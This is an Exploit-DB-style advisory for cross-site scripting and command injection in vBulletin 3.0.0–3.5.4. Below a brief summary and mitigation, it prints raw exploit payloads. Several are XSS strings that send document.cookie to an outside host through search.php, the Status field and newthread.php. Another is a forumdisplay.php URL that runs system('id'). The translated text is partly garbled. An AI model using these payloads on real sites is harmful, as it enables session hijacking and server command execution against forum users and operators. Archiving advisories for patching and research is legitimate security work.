vBulletin 3.0.0 XSS

vendor:

vBulletin

by:

ROOT_EGY

8,8

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: vBulletin

Affected Version From: 3.0.0

Affected Version To: 3.5.4

Patch Exists: Yes

Related CWE: N/A

CPE: a:vbulletin:vbulletin:3.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Web-based

Discovered in 2009

vBulletin 3.0.0 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the search.php, forumdisplay.php, newthread.php, and Status fields of the application. This malicious code can be used to steal cookies, hijack user sessions, and redirect users to malicious websites.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application. Additionally, the application should be kept up to date with the latest security patches.

Source

Exploit-DB raw data:

# Title: vBulletin 3.0.0 XSS
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 3.0.0

===============================================
              WWW.sec-war.com
===============================================

3.0.0 - Introduction XSS scripts in the script search.php. In fact, a hole through a browser implemented.
Example: www.xhh777hhh.som/forumpath//search.php?do=process&showposts=0&query = <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s. jpg? »+ document.cookie; </ script>
3.0-3.0.4 - implementation of commands in the script forumdisplay.php through incorrect handling of variables.
For example: www.xhh777hhh.som/forumpath/forumdisplay.php?GLOBALS [] = 1 & f = 2 & comma = ». System ( 'id').»
3.0.3-3.0.9 introduction XSS scripts in the Status field.
Way to change the status can only admins, for example, moderators. Is an example code sployta: <body onLoad=img = new Image(); img.src = «http://antichat.ru/cgi-bin/s.jpg?»+document.cookie;>
3.0.9 and 3.5.4 - introduction XSS scripts in parameter posthash scenario newthread.php.
Here primerchik:
www.site.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s = & f = 3 & do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime = '% 2Bimg = new Image (); img. src = «http://antichat.ru/cgi-bin/s.jpg?» + document.cookie;% 2B '& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl = 1 & disablesmilies = 1 & emailupdate = 3 & postpoll = yes & polloptions = 1234 & openclose = 1 & stickunstick = 1 & iconid = 0

===============================================

ROOT_EGY  to connect: r0t@hotmail.es

===============================================

Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.

===============================================